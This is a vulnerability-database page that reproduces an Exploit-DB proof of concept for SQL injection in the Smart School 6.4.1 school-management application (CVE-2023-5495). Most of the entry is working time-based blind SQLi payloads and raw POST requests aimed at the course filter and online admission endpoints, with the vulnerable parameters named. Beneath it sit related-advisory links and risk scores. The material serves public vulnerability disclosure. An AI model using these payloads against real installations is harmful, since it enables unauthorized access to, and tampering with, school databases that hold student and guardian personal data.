Lucene search
+L

Smart School 6.4.1 - SQL Injection

🗓️ 02 Apr 2024 00:00:00Reported by CraCkErType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 388 Views

Smart School 6.4.1 SQL Injection allows unauthorized data access, modification, and application cras

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Smart School 6.4.1 - SQL Injection Vulnerability
2 Apr 202400:00
zdt
Circl
CVE-2023-5495
10 Oct 202320:22
circl
CNNVD
QDocs Smart School SQL Injection Vulnerability
10 Oct 202300:00
cnnvd
CVE
CVE-2023-5495
10 Oct 202316:31
cve
Cvelist
CVE-2023-5495 QDocs Smart School HTTP POST Request sql injection
10 Oct 202316:31
cvelist
EUVD
EUVD-2023-57809
3 Oct 202520:07
euvd
NVD
CVE-2023-5495
10 Oct 202317:15
nvd
OSV
CVE-2023-5495
10 Oct 202317:15
osv
Packet Storm
Smart School 6.4.1 SQL Injection
11 Oct 202300:00
packetstorm
Prion
Sql injection
10 Oct 202317:15
prion
Rows per page
# Exploit Title: Smart School 6.4.1 - SQL Injection
# Exploit Author: CraCkEr
# Date: 28/09/2023
# Vendor: QDocs - qdocs.net
# Vendor Homepage: https://smart-school.in/
# Software Link: https://demo.smart-school.in/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-5495
# CWE: CWE-89 - CWE-74 - CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.


Path: /course/filterRecords/

POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]

-------------------------------------------
POST /course/filterRecords/ HTTP/1.1


searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3

-------------------------------------------

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]


Path: /course/filterRecords/


POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi
POST Parameter 'searchdata[1][title]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi

---
Parameter: searchdata[0][title] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[0][searchfield] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[0][searchvalue] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[1][title] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[1][searchvalue] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z
---


-------------------------------------------
POST /course/filterRecords/ HTTP/1.1


searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]
-------------------------------------------



Path: /online_admission

---
Parameter: MULTIPART email ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--
---

POST Parameter 'email' is vulnerable to SQLi

POST /online_admission HTTP/1.1

-----------------------------320375734131102816923531485385
Content-Disposition: form-data; name="email"

*[SQLi]
-----------------------------320375734131102816923531485385


[-] Done

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Apr 2024 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 3.16.3 - 9.8
CVSS 26.5
CVSS 36.3
EPSS0.0106
SSVC
388